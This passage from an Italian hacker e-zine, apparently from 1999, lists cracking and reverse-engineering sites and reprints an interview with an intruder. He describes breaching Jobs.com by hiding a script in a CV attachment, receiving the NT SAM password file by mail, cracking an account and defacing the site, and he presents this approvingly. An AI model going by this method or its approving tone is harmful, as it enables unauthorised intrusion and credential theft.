Il creatore del John the ripper: http://www.false.com/security/john/ ****** bfi: http://www.s0ftpj.org/bfi ***************** Il grande Cavallo de Cavallis: http://members.tripod.com/~CavallodeCavallis/ ***** Gli Spippolatori: http://www.spippolatori.com ***** MrZero: http://www2.sienanet.it/users/MrZeRo/choice.html **** Il sito di Kalidor: www.kalidor.tsx.org ****** Ring Z3r0 (Reverse engeenering): http://ringzer0.cjb.net ********** Drac: http://www.infocom.it/drac/ (Sito ricco di crackz) ****** Il Sito del Grande Quequero: http://quequero.cjb.net (Un sito di un nostro MemberZ che smanetta molto con il Reverse Engeenering! se non andate a vederlo siete morti!!!!!!) *************** Valvoline crew: http://valvoline.cjb.net (Il sito dei nostri amici Valvoline, Visitare Pleeese!!!!) ****************** Il sito di b0nu$: http://wurstel.ing.unibs.it/~bonus (Un altro sito di un nostro MemberZ che smanetta molto con l'Assembler, assolutamente da visitare!) ***************** Boozed Toxin: http://web.interpuntonet.it/xj/ Il sito di T0rment0 che sforna una nuova e-zine AntiSocial: http://AntiSocial.tsx.org **** The Pac-Man: http://thepacman.tsx.org **** Anarchy in the system: http://aisprod.tsx.org ***** (sito che sforna la rivista Anarchy in the system) **** Insecure: http://www.insecure.org/ **** ZioMarzo : http://come.to/ziomarzo **** (ancora in allestimento) Dislessici: http://www.dislessici.org/index.php3 ********** Artemis: http://62.52.93.180/Artemis_23am/ **** LeLe: http://utenti.tripod.it/Lele_HomePage/default.htm **** Bobbymetal: http://members.theglobe.com/Bobbymetal/ *** Questa volta solo siti caxxuti:) Hi all - Reset (Attila-Hack MemberZ) P.S. Se me ne sono perso qualcuno, scrivete a attila_hack@hotmail.com e provveder;-). +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- _ _| | _) |BoBo & LaNdo | __ \ __| _ \ __|\ \ / | __| __| _ \ | | | | __/ | \ \ / |\__ \ | __/ ___|_| _|\__|\___|_| \_/ _|____/\__|\___| Parla l'Hacker di Jobs.com: by Reset Con Drago98 abbiamo discusso i dettagli della sua azione di hacking portata via web sui server del frequentatissimo sito dedicato al lavoro Fonte: Punto Informatico - Stand By 27/8/1999 - Roma - Drago98 un hacker italiano che ci ha contattato dopo aver attaccato via internet un celebre sito internet, Jobs.com. Ecco l'intervista che abbiamo realizzato. D: quando hai aggredito il sito? R: il 13 Agosto 1999 ore 9.40 (locale) D: perch hai scelto quel sito? R: ho usato un loro prodotto e durante il suo utilizzo mi sono accorto del potenziale buco. D: quali sistemi di sicurezza hai dovuto superare? R: il sito ben protetto, gi alcuni "colleghi" avevano provato, ma il proxy e la doppia scheda di rete rendevano le cose difficili, con la mia intuizione non mi sono dovuto preoccupare di sfondare porte, ho sfruttato il buco trovato. D: hai lasciato tracce? Quali? R: s. Un messaggio nel event log di NT: "Error 9999 - Drago Was Here. I think that you have need of a Hacker in your staff!" D: la prima volta che entri in un sito? R: la 6a volta, ma il mio primo sito per grado di difficolt e numero di accessi. D: quanti anni hai? Dove vivi? R: ho superato i 25 anni e vivo nel nord Italia. D: cosa pensi dell'hacking di siti web? E del cracking? R: credo nell'hacking come filosofia, ma non mi convince l'idea di creare difficolt (soprattutto economiche) a persone che non hanno abbastanza tempo o soldi per proteggersi dai "monelli" dell'informatica. Credo nel light-hacking. E cio chi entra, lascia il segno, ma senza far danni, al massimo un backup di curiosit off-line. D: hai rapporti con altri hacker o cracker? R: indispensabile avere rapporti (non sessuali!) con altri hacker. La filosofia hacker pretende che le informazioni vengano condivise e passate a chi pu migliorare il valore della societ hacker. Per quanto riguarda il fatto, l'hacking c' stato ed stato visto. In Jobs.com hanno allestito nuove politiche di sicurezza e tentare ora significherebbe essere beccati (con una percentuale di rischio del 60%). Per rispondere alla tua email devo loggarmi su una macchina "sicura" che poi ridireziona l'email a hotmail. Non dimenticare che sulla loro home page, craccate ho lasciato quest'account! In ogni caso, ho ottenuto la gloria e il sostegno da tutta la comunit hacker italiana e di alcuni pezzi (non tanto grossi) della comunit hacker USA, in questo senso mi sento soddisfatto (se ce da esserlo :)) D: tecnicamente, come hai compiuto la tua azione? R: la Jobs.com distribuisce un prodotto (scritto in Visual Basic) per la guida e il supporto alla realizzazione di un Curriculum Vitae. Tempo fa ho trovato lavoro negli USA grazie a quell'applicazione (che infame!! Sob!) e nell'uso mi accorsi che il prodotto offriva la possibilit di allegare un documento al tuo curriculum, facendo opportuno controllo se il file fosse di tipo binario o testuale. Bene, ho decompilato (reverse engineering) il pacchetto (resume), ho scoperto il mail sever che utilizzava e alcuni parametri che non avrei mai realizzato (data anche la complessa fantasia del creatore) e li ho usati per il mio hacking. Ho compilato un Curriculum utilizzando quel prodotto (con un altra identit!!), ho allegato un documento testuale con dentro NON le mie referenze ma uno script WSH (Window Script Host) che viene interpretato da una DLL installata da NT Option Pack (devono avercela tutti i sistemi WEB-NT). Quando ho spedito il Curriculum (attraverso il programma), il mio script arrivato nella pancia del server, il processo automatico di smistamento curricula ha cercato di leggere il file per verificare se fosse un binario (potenzialmente infetto), nel tentativo di leggerlo NT si accorto dell'estensione eseguendo lo script. Dopo 2.05667 secondi esatti mi arrivato nel mio mail box un ringraziamento del mail server per aver spedito il mio curriculum, con in attach la SAM (il file della sicurezza) di NT. A quel punto con una utility della comunit ho tradotto la SAM, recuperato un account, sono entrato, ho dato un occhio qui e l. Ho modificato la home page, lasciato il messaggio al sistemista e avvertito un p di amici e la comunit. Ho emesso un grido per la gioia. I migliori hacking sono i pi semplici, ma ben congegnati. Intervista a cura di Paolo De Andreis ed disponibile al sito: http://www.deandreis.it/pin/standby/index/.htm Si ringrazia per la gentile concessione Drago98 Saluti a tutti Reset A_H MemberZ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- Hanno collaborato a questa e-zine: Mr_Skull, LaNdo, Zio Marzo, Away, LiQUID, Ritz, S2, b0nu$, The Pac-Man, BugByte, Mr.Lamah, Quequero, ZioButtha, Reset, Spaghetti Phreaker Team, The Crazy e BoBo. _| _|_|_|_| _| _| _| _| _| _|BoBo & LaNdo _| _|_|_| _|_| _|_| _| _| _| _| _|_|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _|_|_| _| _| _| ------------------------------------------------------------ - __ __ ___.BoBo & LaNdo- - / \ / \_____ ____ ____ _____ \_ |__ ____ - - \ \/\/ /\__ \ / \ / \\__ \ | __ \_/ __ \ - - \ / / __ \| | \ | \/ __ \| \_\ \ ___/ - - \__/\ / (____ /___| /___| (____ /___ /\___ > - - \/ \/ \/ \/ \/ \/ \/ - ------------------------------------------------------------ (`..`..-> Attila_Hack crew <-..`..) ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K || ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| Url: http://www.attilahack.cjb.net mailing list: attila_hack@egroups.com e-mail: attila_hack@hotmail.com newsgroup: alt.hackers.attila_hack (solo dal news server: news.tiscalinet.it) irc: #hack-it, #muretto, #crack-it, #wannabe, #attila_hk, #it@lia, #phreak-it